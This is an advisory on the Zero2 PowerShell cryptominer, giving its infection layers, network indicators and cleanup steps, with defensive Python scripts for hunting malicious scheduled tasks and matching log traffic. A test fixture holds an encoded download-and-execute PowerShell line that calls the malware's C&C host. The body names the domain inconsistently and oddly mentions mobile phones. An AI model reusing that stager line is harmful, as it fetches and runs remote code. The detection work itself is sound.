Zero2 Malware

According to the PADVISH anti-virus team, Zero2 is a newly observed cryptocurrency-mining malware that is currently spreading among computer systems. It uses PowerShell, a standard system tool, to run its malicious code and to propagate across the internal network. Its purpose is to mine bitcoin and other digital currencies on the victim's system. Antivirus products detect this malware as Exploit.Win32.Zero2.a.

The malware contacts its server in several stages and carries out the infection by executing malicious code in the victim's system memory. Its complexity shows in the many layers of code obfuscation and, in some stages, in fileless operation: the malware relies on scheduled-task (Job) XML files on the victim's system whose only function is to connect to the malicious server and download further malicious code. The malware spreads through the EternalBlue exploit, brute-force attacks, and the Pass-the-Hash technique.

The malware executes in multiple layers. The command stored in the malware's job is base64-encoded. The first layer starts from the original malicious job file, which tries to reach the malware's URL and hands the following scripts to PowerShell; the malware downloads these scripts by communicating with its C&C server. The next layer creates a second malware job called Rtsa. This job is also linked to t[.]Zero[.]Com and attempts to download subsequent scripts; spreading and exploitation of vulnerabilities happen in this layer. In the last layer the malware downloads its mining modules, chosen according to the information it has collected about the system. This module is injected into and executed through the powershell process.
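Because the persistence described above lives in scheduled-task (Job) XML files that launch base64-encoded PowerShell, a defender can triage a host by exporting its task definitions and decoding every -EncodedCommand payload. The following script is an added example written for this advisory, not PADVISH tooling or a Zero2 sample: it parses Task Scheduler XML (the real 2004/02 task schema), decodes the UTF-16LE base64 that PowerShell expects after -EncodedCommand, and flags tasks that either reference the domains listed under "Symptoms of infection" or combine an encoded command with typical download-and-execute markers. The two task definitions embedded in it are constructed for the demonstration; the task name Rtsa is taken from the advisory, the script path and the stager body are invented.

```python
"""Hunt for suspicious PowerShell scheduled tasks in exported Task Scheduler XML.

Added example for this advisory (not PADVISH code). On a real host the XML comes
from the files under C:\\Windows\\System32\\Tasks or from `schtasks /query /xml`;
the two tasks embedded below are constructed for the demonstration.
"""
import base64
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Domains listed in the advisory, with the defanging brackets removed for matching.
IOC_DOMAINS = ("t.zer2.com", "down.ackng.com", "lpp.zer2.com", "lpp.ackng.com")

# Generic download-and-execute stager markers (not specific to Zero2).
STAGER_MARKERS = ("downloadstring", "net.webclient", "invoke-expression",
                  "iex ", "-nop", "hidden")

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -enc).
ENC_FLAG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(arguments: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_task(xml_text) -> dict:
    """Parse one task definition and score every <Exec> action that runs PowerShell."""
    root = ET.fromstring(xml_text)
    uri = root.findtext(f"{NS}RegistrationInfo/{NS}URI", default="<unnamed>")
    finding = {"task": uri, "powershell": False, "encoded": False,
               "ioc_domains": set(), "stager_markers": set(), "suspicious": False}
    for exec_node in root.iter(f"{NS}Exec"):
        command = (exec_node.findtext(f"{NS}Command") or "").lower()
        arguments = exec_node.findtext(f"{NS}Arguments") or ""
        if "powershell" not in command:
            continue
        finding["powershell"] = True
        plaintext = decode_encoded_command(arguments)
        if plaintext is not None:
            finding["encoded"] = True
        # Inspect the outer switches (-nop, -w hidden) together with the decoded body.
        text = (arguments + " " + (plaintext or "")).lower()
        finding["ioc_domains"].update(d for d in IOC_DOMAINS if d in text)
        finding["stager_markers"].update(m for m in STAGER_MARKERS if m in text)
    finding["ioc_domains"] = sorted(finding["ioc_domains"])
    finding["stager_markers"] = sorted(finding["stager_markers"])
    # A known domain is conclusive; otherwise require hidden/encoded PowerShell that downloads code.
    finding["suspicious"] = bool(finding["ioc_domains"]) or (
        finding["encoded"] and len(finding["stager_markers"]) >= 2)
    return finding


def scan_tasks(task_xmls) -> List[dict]:
    """Return the findings for every task that matches the stager pattern."""
    return [f for f in (analyse_task(x) for x in task_xmls) if f["suspicious"]]


def _encode(ps: str) -> str:
    """Encode a PowerShell command the way -EncodedCommand expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed task modelled on the behaviour the advisory describes; not a real sample.
MALICIOUS_TASK = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Rtsa</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-nop -w hidden -enc {_encode("IEX (New-Object Net.WebClient).DownloadString('http://t.zer2.com/stage2')")}</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task: PowerShell, but a signed script and no download markers.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Maintenance\\NightlyBackup</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for hit in scan_tasks([MALICIOUS_TASK, BENIGN_TASK]):
        print(hit)
```

Tasks that the scan flags are the "malware created jobs" the clearing section tells you to delete; keep a copy of the decoded command before removing the task, since the URL and the second-stage script name it contains are the evidence for blocking the C&C host and for checking other machines on the network.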

Symptoms of infection
An infected system connects to the following URLs:

  • t[.]zer2[.]com/{uri}
  • down[.]ackng[.]com
  • lpp[.]zer2[.]com:443
  • lpp[.]ackng[.]com:443
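The indicators above are defanged with `[.]`, and one of them carries a `{uri}` path placeholder while two carry a port, so they need normalising before they can be matched against DNS or proxy logs. The script below is an added example for this advisory, not PADVISH tooling: it refangs the four indicators into host plus optional port, matches log entries on the host or any of its subdomains, records whether the port agrees, and lists the client addresses that contacted any of them. The log format ("timestamp client destination-host port") and every log line in it are constructed for the demonstration; adapt the regular expression to your own log source.

```python
"""Match the advisory's defanged network indicators against DNS/proxy log lines.

Added example for this advisory (not PADVISH tooling). The log layout and the
sample lines are constructed; only the four indicators come from the advisory.
"""
import re
from typing import Dict, List, Optional

# Indicators exactly as the advisory lists them (defanged with [.]).
DEFANGED_IOCS = (
    "t[.]zer2[.]com/{uri}",
    "down[.]ackng[.]com",
    "lpp[.]zer2[.]com:443",
    "lpp[.]ackng[.]com:443",
)


def refang(ioc: str) -> Dict[str, object]:
    """Turn a defanged indicator into {'host': ..., 'port': ...}; path placeholders are dropped."""
    host = ioc.replace("[.]", ".").replace("hxxp", "http")
    host = host.split("/")[0]            # strip the "/{uri}" path placeholder
    port: Optional[int] = None
    if ":" in host:
        host, port_str = host.rsplit(":", 1)
        port = int(port_str)
    return {"host": host.lower(), "port": port}


IOCS = [refang(i) for i in DEFANGED_IOCS]

# Constructed log layout: "<ISO timestamp> <client ip> <destination host> <port>"
LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\d+)$")

# Constructed sample log; no real traffic.
SAMPLE_LOG = """\
2023-05-01T10:00:01Z 10.0.0.12 www.example.com 443
2023-05-01T10:00:07Z 10.0.0.12 t.zer2.com 80
2023-05-01T10:00:09Z 10.0.0.12 lpp.zer2.com 443
2023-05-01T10:00:11Z 10.0.0.45 down.ackng.com 80
2023-05-01T10:00:15Z 10.0.0.45 lpp.ackng.com 8080
2023-05-01T10:00:20Z 10.0.0.77 update.microsoft.com 443
"""


def match_line(line: str) -> Optional[Dict[str, object]]:
    """Return a hit record if the line's destination matches an indicator, else None."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    ts, client, host, port = m.group(1), m.group(2), m.group(3).lower(), int(m.group(4))
    for ioc in IOCS:
        # Match the exact host or any subdomain of it (the advisory's t.zer2.com/{uri} form).
        if host != ioc["host"] and not host.endswith("." + ioc["host"]):
            continue
        # A port in the indicator narrows the match; a host-only indicator matches any port.
        exact_port = ioc["port"] is None or ioc["port"] == port
        return {"time": ts, "client": client, "host": host, "port": port,
                "indicator": ioc["host"], "port_matches": exact_port}
    return None


def scan_log(text: str) -> List[Dict[str, object]]:
    """All log entries that touched one of the advisory's hosts."""
    return [h for h in (match_line(line) for line in text.splitlines()) if h]


def infected_clients(text: str) -> List[str]:
    """Client addresses to triage: every system that contacted an indicator host."""
    return sorted({str(h["client"]) for h in scan_log(text)})


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print("clients to triage:", infected_clients(SAMPLE_LOG))
```

A hit whose `port_matches` is False (lpp.ackng.com on 8080 in the sample) still names an indicator host and should be investigated; the port mismatch only means the connection does not match the advisory's exact form.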

Methods of Clearing Infected system

  • Deleting malware created jobs
  • Installing a reputable antivirus product and keeping it updated

Methods of Infection Prevention
The following recommendations can play a significant role in preventing the infection of mobile phones.

  • Do not download and install applications from untrusted sources
  • Apply security updates related to discovered vulnerabilities, including EternalBlue
  • Do not download and install cracked applications from untrusted sources
  • Install anti-virus software and update it periodically

Because the spread of various types of malware and viruses on computer systems has caused many problems for their owners in recent years, installing anti-virus software is essential to prevent the infection of computer systems and the further spread of malware. Always use a reputable anti-virus product and update it regularly so that the virus scans on your computer system remain effective.